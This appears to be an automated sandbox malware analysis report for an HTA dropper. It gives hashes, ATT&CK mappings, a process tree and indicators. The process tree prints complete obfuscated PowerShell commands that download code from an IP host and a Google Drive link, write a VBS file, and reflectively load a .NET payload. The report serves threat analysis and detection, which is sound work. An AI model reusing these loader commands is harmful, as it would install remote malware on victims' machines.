e25677838f8394ed8b59c431e454e3bd0ec107421ef1a2502c5167bdd1340ddc

General

Target

greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Size

131KB
MD5

cbb8dddfef9d1d2893d4a4b51b4f0dab
SHA1

595c2221b9613342ed4a82c235ea19fe9c0383f9
SHA256

e25677838f8394ed8b59c431e454e3bd0ec107421ef1a2502c5167bdd1340ddc
SHA512

1daa9c96c9ba2e6e1939ab2b82e9a8f771f9ba0d4c4d088214864034aa9084483c1f42e5436f32043809a0346f0d59d84eb902946e6f1672175e22cac042d4a4
SSDEEP

192:4vCFXMFgYPCgYmHUCYc6dEMoyzsDxgYtaXQ:0CF8qYPRYmHU1Jyh2saYtag

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

poWersHElL.eXepowershell.exe

flow pid process

4 2088 poWersHElL.eXe
6 2132 powershell.exe
8 2132 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3024 powershell.exe
2132 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

poWersHElL.eXepowershell.exe

pid process

2088 poWersHElL.eXe
2492 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2088	poWersHElL.eXe
6	2132	powershell.exe
8	2132	powershell.exe

pid	process
3024	powershell.exe
2132	powershell.exe

pid	process
2088	poWersHElL.eXe
2492	powershell.exe

flow	ioc
6	drive.google.com
5	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

poWersHElL.eXepowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWersHElL.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

poWersHElL.eXepowershell.exepowershell.exepowershell.exe

pid process

2088 poWersHElL.eXe
2492 powershell.exe
2088 poWersHElL.eXe
2088 poWersHElL.eXe
3024 powershell.exe
2132 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2088	poWersHElL.eXe
2492	powershell.exe
2088	poWersHElL.eXe
2088	poWersHElL.eXe
3024	powershell.exe
2132	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

poWersHElL.eXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2088	poWersHElL.eXe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepoWersHElL.eXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1940 wrote to memory of 2088	1940	mshta.exe	poWersHElL.eXe
PID 1940 wrote to memory of 2088	1940	mshta.exe	poWersHElL.eXe
PID 1940 wrote to memory of 2088	1940	mshta.exe	poWersHElL.eXe
PID 1940 wrote to memory of 2088	1940	mshta.exe	poWersHElL.eXe
PID 2088 wrote to memory of 2492	2088	poWersHElL.eXe	powershell.exe
PID 2088 wrote to memory of 2492	2088	poWersHElL.eXe	powershell.exe
PID 2088 wrote to memory of 2492	2088	poWersHElL.eXe	powershell.exe
PID 2088 wrote to memory of 2492	2088	poWersHElL.eXe	powershell.exe
PID 2088 wrote to memory of 2804	2088	poWersHElL.eXe	csc.exe
PID 2088 wrote to memory of 2804	2088	poWersHElL.eXe	csc.exe
PID 2088 wrote to memory of 2804	2088	poWersHElL.eXe	csc.exe
PID 2088 wrote to memory of 2804	2088	poWersHElL.eXe	csc.exe
PID 2804 wrote to memory of 2692	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2692	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2692	2804	csc.exe	cvtres.exe
PID 2804 wrote to memory of 2692	2804	csc.exe	cvtres.exe
PID 2088 wrote to memory of 2648	2088	poWersHElL.eXe	WScript.exe
PID 2088 wrote to memory of 2648	2088	poWersHElL.eXe	WScript.exe
PID 2088 wrote to memory of 2648	2088	poWersHElL.eXe	WScript.exe
PID 2088 wrote to memory of 2648	2088	poWersHElL.eXe	WScript.exe
PID 2648 wrote to memory of 3024	2648	WScript.exe	powershell.exe
PID 2648 wrote to memory of 3024	2648	WScript.exe	powershell.exe
PID 2648 wrote to memory of 3024	2648	WScript.exe	powershell.exe
PID 2648 wrote to memory of 3024	2648	WScript.exe	powershell.exe
PID 3024 wrote to memory of 2132	3024	powershell.exe	powershell.exe
PID 3024 wrote to memory of 2132	3024	powershell.exe	powershell.exe
PID 3024 wrote to memory of 2132	3024	powershell.exe	powershell.exe
PID 3024 wrote to memory of 2132	3024	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\SysWOW64\wInDOwsPoWershelL\V1.0\poWersHElL.eXe
  "C:\Windows\sYSTem32\wInDOwsPoWershelL\V1.0\poWersHElL.eXe" "poWeRsHelL -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt ; Iex($(Iex('[SysTeM.TeXT.eNcodinG]'+[cHar]0X3A+[CHar]58+'uTf8.getstRINg([SYStem.coNverT]'+[ChAr]58+[CHAr]0X3a+'FrOMbase64string('+[CHar]34+'JExQeDFxblA4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFRmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp4dixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1F3WUNWRXp3LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y09BdkJkQ09qaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJvcFhURixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZUZzYngiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVW94dVR4VnNtUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTFB4MXFuUDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1NS8zMTEvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2Rvd2l0aG1lLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0cGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nLnZiUyIsMCwwKTtzVGFyVC1zbEVFUCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmcudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aibb6f7s.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAE6.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2692
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatnewswithgoodthing.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWUt3aScrJ21hZ2VVcmwgPSBJSG1odHRwczovL2RyaScrJ3ZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBJSG07WUt3d2ViQ2xpZW50JysnID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtZS3dpbWFnZUJ5dGVzID0gWUt3d2ViQ2wnKydpZW50LkRvd25sb2FkRGF0YShZS3dpbWFnZVVybCk7WUt3aW0nKydhZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcoWUt3aW1hZ2VCeXRlcyk7WUt3c3QnKydhcnRGJysnbGFnID0gSUhtPDxCQVNFNjRfU1RBUlQ+PklIbTtZS3dlbmRGbGFnID0gSUhtPDxCQVNFNjRfRU5EPj5JSG07WUt3c3RhcnRJbmRleCA9IFlLd2ltYWdlVGV4dC5JJysnbmRleE9mKFlLd3N0YScrJ3J0RmxhZyk7WUt3ZW5kSW5kZXggPSBZS3dpbWFnZVRleHQuSW5kZXhPZihZS3dlbmRGbGFnKTtZS3dzdGFydEluZGV4IC1nZSAwIC1hbmQgWUt3ZW5kSW5kZXggJysnLWd0IFlLd3N0YXJ0SW5kZXg7WUt3c3RhcnRJbmRleCArPSBZS3dzdGFydEZsYWcuTGVuZ3RoO1lLd2Jhc2U2NExlbmd0JysnaCA9IFlLd2VuZEluZGV4IC0gWUt3c3RhcnRJbmRleDtZS3diYXNlNjRDb21tYW5kID0gWUt3aW1hZ2VUZXh0LlN1YnN0cmluZyhZS3dzdGFydEluZGV4LCBZS3diYXNlNjRMZW5ndGgpO1lLd2Jhc2U2NFJldicrJ2Vyc2VkID0gLWpvaW4gKFlLd2Jhc2U2NENvbW1hbmQnKycuVG9DaGEnKydyQXJyYXkoKSBWSFUgRm9yJysnRWFjaC1PYmonKydlY3QnKycgJysneyBZSycrJ3dfIH0pWy0xLi4tKCcrJ1lLd2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07WUt3Y29tbWFuZEJ5dGVzID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhZS3diYXMnKydlNjRSZXZlcnNlZCk7WUt3bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzJysnZW1ibHknKyddOjpMb2FkKFlLJysnd2MnKydvbW1hbmRCeXRlcyk7WUt3dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWUnKyddLkdldE1ldGhvZChJSG1WQUlJSG0pO1lLd3ZhaU1ldGhvZC5JbnZvJysna2UoWUt3bnVsbCwgQChJSG10eHQuUEwnKydMUE1TLzExMy81NTEuODcxLjY0JysnLjg5MS8vOnB0dGhJSG0sIElIbWRlc2F0aXZhZG9JSG0sIElIJysnbWRlc2F0aXZhZG9JSG0sIElIJysnbWRlc2F0aXZhZG9JJysnSG0sIElIbWFzcG5ldF9yZWdicm93c2Vyc0lIbSwgSUhtZGVzYXRpdmFkb0lIbSwgSUhtZGVzYXRpdmFkb0lIJysnbSxJSG0nKydkZXNhdGl2YWRvSUhtLElIbWRlc2F0aXZhZG9JJysnSG0sSUhtZGVzYXRpdmFkb0lIbSxJSG1kZXNhdGl2YWRvSUhtLElIbWRlc2F0aXZhZG9JSG0sSUhtMUlIbSxJSG1kZXNhdGl2YWRvSUhtKSk7JyktQ1JFcExhQ2UoW2NoQXJdODkrW2NoQXJdNzUrW2NoQXJdMTE5KSxbY2hBcl0zNiAtUkVwTEFjZSAgKFtjaEFyXTczK1tjaEFyXTcyK1tjaEFyXTEwOSksW2NoQXJdMzkgLVJFcExBY2UgIChbY2hBcl04NitbY2hBcl03MitbY2hBcl04NSksW2NoQXJdMTI0KSB8JiAoICRzaEVsTGlkWzFdKyRzaEVMbElEWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3024
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YKwi'+'mageUrl = IHmhttps://dri'+'ve.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur IHm;YKwwebClient'+' = New-Object System.Net.WebClient;YKwimageBytes = YKwwebCl'+'ient.DownloadData(YKwimageUrl);YKwim'+'ageText = [System.Text.Encoding]::UTF8.GetStr'+'ing(YKwimageBytes);YKwst'+'artF'+'lag = IHm<<BASE64_START>>IHm;YKwendFlag = IHm<<BASE64_END>>IHm;YKwstartIndex = YKwimageText.I'+'ndexOf(YKwsta'+'rtFlag);YKwendIndex = YKwimageText.IndexOf(YKwendFlag);YKwstartIndex -ge 0 -and YKwendIndex '+'-gt YKwstartIndex;YKwstartIndex += YKwstartFlag.Length;YKwbase64Lengt'+'h = YKwendIndex - YKwstartIndex;YKwbase64Command = YKwimageText.Substring(YKwstartIndex, YKwbase64Length);YKwbase64Rev'+'ersed = -join (YKwbase64Command'+'.ToCha'+'rArray() VHU For'+'Each-Obj'+'ect'+' '+'{ YK'+'w_ })[-1..-('+'YKwbase64Command.Length)];YKwcommandBytes = ['+'System.Convert]::FromBase64String(YKwbas'+'e64Reversed);YKwloadedAssembly = [System.Reflection.Ass'+'embly'+']::Load(YK'+'wc'+'ommandBytes);YKwvaiMethod = [dnlib.IO.Home'+'].GetMethod(IHmVAIIHm);YKwvaiMethod.Invo'+'ke(YKwnull, @(IHmtxt.PL'+'LPMS/113/551.871.64'+'.891//:ptthIHm, IHmdesativadoIHm, IH'+'mdesativadoIHm, IH'+'mdesativadoI'+'Hm, IHmaspnet_regbrowsersIHm, IHmdesativadoIHm, IHmdesativadoIH'+'m,IHm'+'desativadoIHm,IHmdesativadoI'+'Hm,IHmdesativadoIHm,IHmdesativadoIHm,IHmdesativadoIHm,IHm1IHm,IHmdesativadoIHm));')-CREpLaCe([chAr]89+[chAr]75+[chAr]119),[chAr]36 -REpLAce ([chAr]73+[chAr]72+[chAr]109),[chAr]39 -REpLAce ([chAr]86+[chAr]72+[chAr]85),[chAr]124) |& ( $shElLid[1]+$shELlID[13]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBAE7.tmp

Filesize
1KB

MD5
b1e6f8aadbf14c11eec73d8bc9acd790

SHA1
bc23302f2c0fdc73407159c6c3bfed1cb8b69859

SHA256
2dd71988f52b75e4d1eae69c84b28b78f26cc82719b2c7e226a16229d87969de

SHA512
abfc534c08848e378b0318399347bab14384d2f891d676bb586275f0a934b7b6e000632737fc9823962409cbc993fc53e03523a54d1cfef7cf2c876df6843b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\aibb6f7s.dll

Filesize
3KB

MD5
88dd1321a8038e4b0da4111828b7560a

SHA1
f424e27874939fe2fec1fb8bf5a4ccc495ec0935

SHA256
b5605dd8e248cf178125659f1345c125fa053beff726a013973861797be86e19

SHA512
6b5423fa607217f1af379c84c9854d7d8877c82779fe376d5f475846a8963f10d7ce0614ffe70092ff69156a2ed8aa2735d5d5267cce3f39b1862c792143c358

Download Submit
C:\Users\Admin\AppData\Local\Temp\aibb6f7s.pdb

Filesize
7KB

MD5
eb1da9c07b0bbc569892ba98d2bbcb92

SHA1
b26224a6530777610d75d79baaf28b954be685d5

SHA256
3c51512ed6dace26ae6f0529cd8500fb37feae38fd8b71437b0da2c407818f39

SHA512
4604f064084bf4724309a6b252fc083c085a9fd78ce25870f52f3daa997bd503d7842842fe671c6a3d00bdb25ad3cfa3585a1cb0ccc62f93ca516792400be588

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fd19e039e98e11d1e38399ccbbd36b50

SHA1
908ef552231da1c33cb631c9f4d8b03daa5bc6fe

SHA256
7d129ce41ca58c04c07589f13ba88d27e6c235700434a1eeb2a946bcff5b0e07

SHA512
05c24978fe10b4e1cbebae155ae96221e81d4e781bf2430b6befd5f122f61e5ffd70234e837dec4badffff070166a4288f76dd7194c70cfd9445618fd05dfdc2

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatnewswithgoodthing.vbS

Filesize
136KB

MD5
13dfdead1237ba87391d716cb7031869

SHA1
367e066163db84465a0fdcc50d7e94c29683bfed

SHA256
06e60eee01dabc09b89e85a8f8fd97cc483922022d4b3e37e7887fc299ffe2ef

SHA512
4ce204fdb7e54196a01582b5632ff852be3491d181a5d55999b35f2a5a94285b4c4e0ad4c0a5fee6a005a3e6346da251fe6e7bd88a8a122bfb930a1b5c6be7a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBAE6.tmp

Filesize
652B

MD5
7eca0b69b05fccb110b0bfa5db93d0ff

SHA1
ef5a9f3e03059052eefae2351979b3cfe3eeefd8

SHA256
67621f01f9a9cbc2a67b8d5d70737b817d4f4674626cb126d60d68f8402e74d5

SHA512
eafd574aa18e4131a4bba4b94460d1974a98042f22e138e3645b705abcc7e8a12c294f443e584b6f69367e737f4a7778ce4d355555c1f09691b4095e5aba6b86

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aibb6f7s.0.cs

Filesize
471B

MD5
e83b90d88bbe5b8ea6cd0ab094761e19

SHA1
56f5f01fa3aeae7c510b2b77a7f19aea657fc23f

SHA256
c7b8263c0f9bb535d56bef1909a17e1d7c5244b4cf9af3a26abae519210da8c0

SHA512
a43eb03a308a404eca6ab5e37b88420fa3fbba3ba94e05710a6f05d7483c04e326af92d38c32c6ceb244c2b72036156410f827ef0205572c918e905cdb8428da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aibb6f7s.cmdline

Filesize
309B

MD5
5afe193f08dd6a3acda86e00fc4459d9

SHA1
bd3fc7688c54f4b39123b9fd37dd95175b5b4bbc

SHA256
85ff4f3d7076b061cb5f7cf685eb424e2dc925d3f2b77a000d2b8c62bc2b7cb3

SHA512
f58487064e0d774fb80b8f232091e3f790aa92c10087f2603c5c6a12d3fb94ac366462ba504ec0e0fa004bdda08a9e025fecd2106f7506f4e3f32da636077d73

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads